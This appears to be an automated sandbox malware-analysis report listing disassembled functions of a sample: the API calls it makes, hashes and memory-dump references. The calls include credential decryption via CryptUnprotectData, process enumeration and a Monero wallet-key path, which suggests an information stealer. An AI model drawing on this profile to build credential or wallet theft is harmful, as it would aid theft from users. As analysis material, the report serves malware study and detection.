                                    • Opcode ID: 07737e6af603c173caaa460c62f2b2f36b85350b3cbbaefb56c66d896bdb3c0c
                                    • Instruction ID: 5eda399b63443f90a540e5dc5b3e8bcddf05a96679264bb89b742163076fe541
                                    • Opcode Fuzzy Hash: 07737e6af603c173caaa460c62f2b2f36b85350b3cbbaefb56c66d896bdb3c0c
                                    • Instruction Fuzzy Hash: F4B2D5F350C200AFE708AE29EC4567AFBE9EF94720F1A892DE6C5C3344E63558458797
                                    Function 0137F010 Relevance: 7.8, Strings: 5, Instructions: 1587COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: :qj$VFX$pU;~$}dF$+:
                                    • API String ID: 0-3252026929
                                    • Opcode ID: e2a5bc310981b845c65c453aea104104ca25fcb0b826cec19acb32d07e5d8581
                                    • Instruction ID: 9e63710d9939b05e5a3b32c68c3941020a32ed5594bf8930b8ebcecda3bb638a
                                    • Opcode Fuzzy Hash: e2a5bc310981b845c65c453aea104104ca25fcb0b826cec19acb32d07e5d8581
                                    • Instruction Fuzzy Hash: DCB204F3A0C2049FE3086E29EC8567AFBE5EF94320F16492DEAC5C7744E63558418B97
                                    Function 00FAC820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00FAC871
                                    • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00FAC87C
                                    • lstrcat.KERNEL32(?,00FC0B46), ref: 00FAC943
                                    • lstrcat.KERNEL32(?,00FC0B47), ref: 00FAC957
                                    • lstrcat.KERNEL32(?,00FC0B4E), ref: 00FAC978
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$BinaryCryptStringlstrlen
                                    • String ID:
                                    • API String ID: 189259977-0
                                    • Opcode ID: 5a33d6ef675b1be2b148d51bb71b6ffabe0c3f852fc5c9ae03c185e70c55f816
                                    • Instruction ID: 2c7fd4d4546ae1e476249d91361f7247faa4152acc6665972a3939e6e0234483
                                    • Opcode Fuzzy Hash: 5a33d6ef675b1be2b148d51bb71b6ffabe0c3f852fc5c9ae03c185e70c55f816
                                    • Instruction Fuzzy Hash: D1414CB5D0421ADBDB24DFD0DD89BEEBBB8AF88304F1041A8F509A7280D7745A84DF91
                                    Function 00FA7240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00FA724D
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FA7254
                                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00FA7281
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00FA72A4
                                    • LocalFree.KERNEL32(?), ref: 00FA72AE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                    • String ID:
                                    • API String ID: 2609814428-0
                                    • Opcode ID: 38e37d4ba890d5a8783697cd8cc51e19980d88534e9b4328d3f094584c880b5c
                                    • Instruction ID: 75d400aa119f68bd2249ccc443c9ccbfb5112eb5b11b7562c699d99f235e5497
                                    • Opcode Fuzzy Hash: 38e37d4ba890d5a8783697cd8cc51e19980d88534e9b4328d3f094584c880b5c
                                    • Instruction Fuzzy Hash: 1E0140B5A40308BBDB24DBD4DD46F9D77B8AB44701F104054FB15AB2C4DA70AA418B65
                                    Function 00FB9600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00FB961E
                                    • Process32First.KERNEL32(00FC0ACA,00000128), ref: 00FB9632
                                    • Process32Next.KERNEL32(00FC0ACA,00000128), ref: 00FB9647
                                    • StrCmpCA.SHLWAPI(?,00000000), ref: 00FB965C
                                    • CloseHandle.KERNEL32(00FC0ACA), ref: 00FB967A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                    • String ID:
                                    • API String ID: 420147892-0
                                    • Opcode ID: a013efaffb6290370f3159161dc3362aa8c06a1fda1edcf7d066081c90190f23
                                    • Instruction ID: 3b3f9ef35d57ec688c16d2368b866854f362cca7ef8c62e509dbd05d9cea2ab0
                                    • Opcode Fuzzy Hash: a013efaffb6290370f3159161dc3362aa8c06a1fda1edcf7d066081c90190f23
                                    • Instruction Fuzzy Hash: 85015EB5A04208EBCB24DFE5D898BEDBBF9EF08311F004198A90A97240D7749B80DF50
                                    Function 0136E486 Relevance: 6.6, Strings: 4, Instructions: 1635COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: :20$\M/$r^w7$xEI2
                                    • API String ID: 0-1202915757
                                    • Opcode ID: 6bd33c173357c1396dea7cce45d00125e9133d5947c6cf33511bf8d0076a26ef
                                    • Instruction ID: 4d27ed9668bb92bdb1419b73143ed859106f8fb74c3fe09af76fbaa895021005
                                    • Opcode Fuzzy Hash: 6bd33c173357c1396dea7cce45d00125e9133d5947c6cf33511bf8d0076a26ef
                                    • Instruction Fuzzy Hash: CDB236F360C2049FE3046E2DEC8567AFBEAEBD4320F1A463DE6C4C7744EA7558058696
                                    Function 0137343B Relevance: 6.6, Strings: 4, Instructions: 1588COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: 5iU<$:%1$a]_$e0\
                                    • API String ID: 0-844207780
                                    • Opcode ID: c0bd010a54b29e73d211acb7846f28471478535c787ee140cf2c45c659347c27
                                    • Instruction ID: 7defdf44d74cb61928940adf26affe4b7c7ec782b77d997f1c9be90f51ed33f1
                                    • Opcode Fuzzy Hash: c0bd010a54b29e73d211acb7846f28471478535c787ee140cf2c45c659347c27
                                    • Instruction Fuzzy Hash: 4AB2F5F360C2009FE7046E2DEC8567ABBE9EF94320F1A463DEAC4C7744E63598058696
                                    Function 013768E2 Relevance: 6.6, Strings: 4, Instructions: 1559COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: S[$alm$s{zs$t~
                                    • API String ID: 0-3394095219
                                    • Opcode ID: 19065c3349c415a5f892d8dccdf403d2724bba9f28d22818feaf03ba5a9c4f5c
                                    • Instruction ID: 3020e6822e9b92bb0db96c5936977948db01a887e14953ed53040806376ffd0a
                                    • Opcode Fuzzy Hash: 19065c3349c415a5f892d8dccdf403d2724bba9f28d22818feaf03ba5a9c4f5c
                                    • Instruction Fuzzy Hash: 6BA2F7F350C204AFE304BE29EC85A7ABBE9EF94760F16493DE6C4C7744E63598018697
                                    Function 01367CBF Relevance: 6.2, Strings: 4, Instructions: 1189COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: Zg/$F29;$ao~$~C{}
                                    • API String ID: 0-3042852259
                                    • Opcode ID: e6c9a235fbdf298f4eadf306a6e2a668ea55cf0a4e7d62df26e5bc9894538ab7
                                    • Instruction ID: 1aedb69c95027c1e1bc9296091d4e5a7456808a23bcd4dc12e176cb15a6bf107
                                    • Opcode Fuzzy Hash: e6c9a235fbdf298f4eadf306a6e2a668ea55cf0a4e7d62df26e5bc9894538ab7
                                    • Instruction Fuzzy Hash: F6820AF3A082049FE7046E2DEC8577AFBEAEBD4720F1A453DE6C4C3744E93598058696
                                    Function 00FB8680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FBA740: lstrcpy.KERNEL32(00FC0E17,00000000), ref: 00FBA788
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00FC05B7), ref: 00FB86CA
                                    • Process32First.KERNEL32(?,00000128), ref: 00FB86DE
                                    • Process32Next.KERNEL32(?,00000128), ref: 00FB86F3
                                      • Part of subcall function 00FBA9B0: lstrlen.KERNEL32(?,008C8F50,?,\Monero\wallet.keys,00FC0E17), ref: 00FBA9C5
                                      • Part of subcall function 00FBA9B0: lstrcpy.KERNEL32(00000000), ref: 00FBAA04
                                      • Part of subcall function 00FBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00FBAA12
                                      • Part of subcall function 00FBA8A0: lstrcpy.KERNEL32(?,00FC0E17), ref: 00FBA905
                                    • CloseHandle.KERNEL32(?), ref: 00FB8761
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                    • String ID:
                                    • API String ID: 1066202413-0
                                    • Opcode ID: 212637238fe07e88746f4212690aa62ceea1494806cd03c837014365a156ad4f
                                    • Instruction ID: db7bff3a436ca079ff7e6b41d18841326c765a3b9912da9218d1604edcaa6a75
                                    • Opcode Fuzzy Hash: 212637238fe07e88746f4212690aa62ceea1494806cd03c837014365a156ad4f
                                    • Instruction Fuzzy Hash: 83314D71901218ABCB24DF96DC55FEEB7B8EF45700F1041A9E10AA6190DF346E45DFA1
                                    Function 00FB8EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CryptBinaryToStringA.CRYPT32(00000000,00FA5184,40000001,00000000,00000000,?,00FA5184), ref: 00FB8EC0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: BinaryCryptString
                                    • String ID:
                                    • API String ID: 80407269-0
                                    • Opcode ID: b5944e89e05d08f1b0dc0e98186f7923ca44bb7e1d0ace270a2b0e88e8fea980
                                    • Instruction ID: 4065255a2c55d6124e5645d4bca68defaba49f2b33607269e1d0e58cc3ef72ae
                                    • Opcode Fuzzy Hash: b5944e89e05d08f1b0dc0e98186f7923ca44bb7e1d0ace270a2b0e88e8fea980
                                    • Instruction Fuzzy Hash: 5D110671200208AFDB04DFA5E884FFA37ADAFC9750F109458F9198B240DB35E882EF60
                                    Function 00FA9AC0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00FA4EEE,00000000,00000000), ref: 00FA9AEF
                                    • LocalAlloc.KERNEL32(00000040,?,?,?,00FA4EEE,00000000,?), ref: 00FA9B01
                                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00FA4EEE,00000000,00000000), ref: 00FA9B2A
                                    • LocalFree.KERNEL32(?,?,?,?,00FA4EEE,00000000,?), ref: 00FA9B3F
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
